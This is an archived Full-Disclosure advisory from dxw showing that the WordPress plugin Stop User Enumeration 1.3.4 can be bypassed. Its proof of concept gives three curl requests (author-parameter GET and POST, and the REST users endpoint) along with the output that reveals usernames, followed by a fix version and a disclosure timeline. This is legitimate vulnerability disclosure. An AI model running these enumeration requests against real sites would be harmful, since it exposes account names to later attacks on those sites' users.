lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 4 Jan 2017 13:24:13 +0000 From: dxw Security <security@....com> To: fulldisclosure@...lists.org Subject: [FD] Stop User Enumeration does not stop user enumeration (WordPress plugin) Details ================ Software: Stop User Enumeration Version: 1.3.4 Homepage: https://wordpress.org/plugins/stop-user-enumeration/ Advisory report: https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/ CVE: Awaiting assignment CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N) Description ================ Stop User Enumeration does not stop user enumeration Vulnerability ================ Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users. This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt at preventing requests to the REST API. Proof of concept ================ There are three ways to bypass this plugin’s protections. A GET request: $ curl -i -s \'http://localhost/?wp-comments-post&author=1\' HTTP/1.1 301 Moved Permanently Date: Fri, 23 Dec 2016 15:38:02 GMT Server: Apache/2.4.10 (Debian) X-Powered-By: PHP/7.0.13 Location: http://localhost/author/tomdxw/?wp-comments-post Content-Length: 0 Content-Type: text/html; charset=UTF-8 A POST request: $ curl -s http://localhost/?wp-comments-post -d author=1 | grep \'<title\' <title>tomdxw – WP Test</title> The REST API (new in WordPress 4.7): $ curl -s http://localhost/wp-json/wp/v2/users [{\"id\":1,\"name\":\"tomdxw\",\"url\":\"\",\"description\":\"\",\"link\":\"http:\\/\\/localhost\\/author\\/tomdxw\\/\",\"slug\":\"tomdxw\",\"avatar_urls\":{\"24\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g\",\"48\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g\",\"96\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g\"},\"meta\":[],\"_links\":{\"self\":[{\"href\":\"http:\\/\\/localhost\\/wp-json\\/wp\\/v2\\/users\\/1\"}],\"collection\":[{\"href\":\"http:\\/\\/localhost\\/wp-json\\/wp\\/v2\\/users\"}]}}] Mitigations ================ Upgrade to version 1.3.5 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security@....com to acknowledge this report if you received it via a third party (for example, plugins@...dpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-12-23: Discovered 2016-12-23: Reported to vendor via info@...lworks.net 2016-12-23: Requested CVE 2016-12-23: Vendor first replied 2017-01-03: Vendor reported issue fixed in version 1.3.5 2017-01-04: Advisory published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists